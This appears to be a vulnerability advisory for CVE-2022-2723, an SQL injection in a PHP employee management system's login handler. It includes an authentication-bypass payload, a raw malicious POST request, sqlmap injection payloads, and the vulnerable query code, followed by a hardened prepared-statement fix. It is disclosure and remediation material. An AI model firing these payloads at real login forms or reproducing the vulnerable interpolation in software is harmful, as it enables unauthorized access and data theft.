Headline
CVE-2022-2723: PHP Code Audit - Employee Management System eprocess.php SQL Injection
A vulnerability was found in SourceCodester Employee Management System. It has been classified as critical. Affected is an unknown function of the file /process/eprocess.php. The manipulation of the argument mailuid/pwd leads to SQL injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-205836.
SourceCodester Employee Management System eprocess.php SQL Injection
Vendor Homepage:
https://www.sourcecodester.com/php/14432/employee-management-system-using-php.html
Source Code Download:
https://www.sourcecodester.com/sites/default/files/download/razormist/employee-management-system.zip
Proof of Concept
Step 1: Open the URL http://127.0.0.1/ems/elogin.html
Step 2: Use the payload 1' or 1 # in the Email field and anything in the Password field
Step 3: The login succeeds without valid credentials
Malicious Request
POST /ems/process/eprocess.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 40
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36 Edg/104.0.1293.47
Referer: http://192.168.88.195/ems/elogin.html
Accept-Encoding: gzip, deflate
Connection: close
mailuid=1%27+or+1+%23&pwd=1&login-submit=Login
Sqlmap output
---
Parameter: mailuid (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: mailuid=-2408' OR 3144=3144#&pwd=1&login-submit=Login
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: mailuid=1' OR (SELECT 8327 FROM(SELECT COUNT(*),CONCAT(0x7171707871,(SELECT (ELT(8327=8327,1))),0x7162787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- pIQl&pwd=1&login-submit=Login
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: mailuid=1' AND (SELECT 4704 FROM (SELECT(SLEEP(5)))vpmb)-- thNh&pwd=1&login-submit=Login
---
Code
/process/eprocess.php, lines 5-12:
// User-controlled values are taken straight from the POST body.
$email = $_POST['mailuid'];
$password = $_POST['pwd'];
// Both values are interpolated into the SQL text without escaping or binding,
// so a quote in $email terminates the literal and the rest (or 1 #) rewrites the WHERE clause.
$sql = "SELECT * from `employee` WHERE email = '$email' AND password = '$password'";
$sqlid = "SELECT id from `employee` WHERE email = '$email' AND password = '$password'";
// The injected queries are executed as-is; the second one yields the id used for the session.
$result = mysqli_query($conn, $sql);
$id = mysqli_query($conn , $sqlid);
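A hardened replacement for that block, added here as an example and not taken from the project. It assumes $conn is the same open mysqli connection the original uses, that mysqlnd is available for mysqli_stmt_get_result, and (for the password check) that the password column holds password_hash() output rather than plaintext.

```php
<?php
// Hardened version of the query-building block in /process/eprocess.php.
// Added example, not the project's code. Assumes $conn is an open mysqli
// connection and that `employee` has columns id, email and password.

$email    = $_POST['mailuid'] ?? '';
$password = $_POST['pwd'] ?? '';

// A prepared statement sends the SQL text and the values separately, so an
// input such as  1' or 1 #  is compared literally against the email column
// and can no longer change the WHERE clause.
$stmt = mysqli_prepare(
    $conn,
    'SELECT id, password FROM `employee` WHERE email = ? LIMIT 1'
);
if ($stmt === false) {
    // Fail closed: never fall back to building the query by interpolation.
    http_response_code(500);
    exit('Login temporarily unavailable');
}
mysqli_stmt_bind_param($stmt, 's', $email);
mysqli_stmt_execute($stmt);
$row = mysqli_fetch_assoc(mysqli_stmt_get_result($stmt));
mysqli_stmt_close($stmt);

// Assumption: password stores password_hash() output. The original compares
// the submitted password inside the SQL text, which only works if passwords
// are kept in plaintext; verifying a hash in PHP removes that as well.
// Checking a dummy hash when no row matches keeps the timing uniform.
$storedHash = $row['password'] ?? password_hash('dummy', PASSWORD_DEFAULT);
if ($row !== null && password_verify($password, $storedHash)) {
    $id = (int) $row['id'];
    // ... continue with the application's existing session setup using $id ...
} else {
    // One generic response for both unknown email and wrong password.
    header('Location: ../elogin.html?error=invalid');
    exit;
}
```

With this in place the sqlmap probes above return no boolean, error or time differential, because the bound value never reaches the parser as SQL.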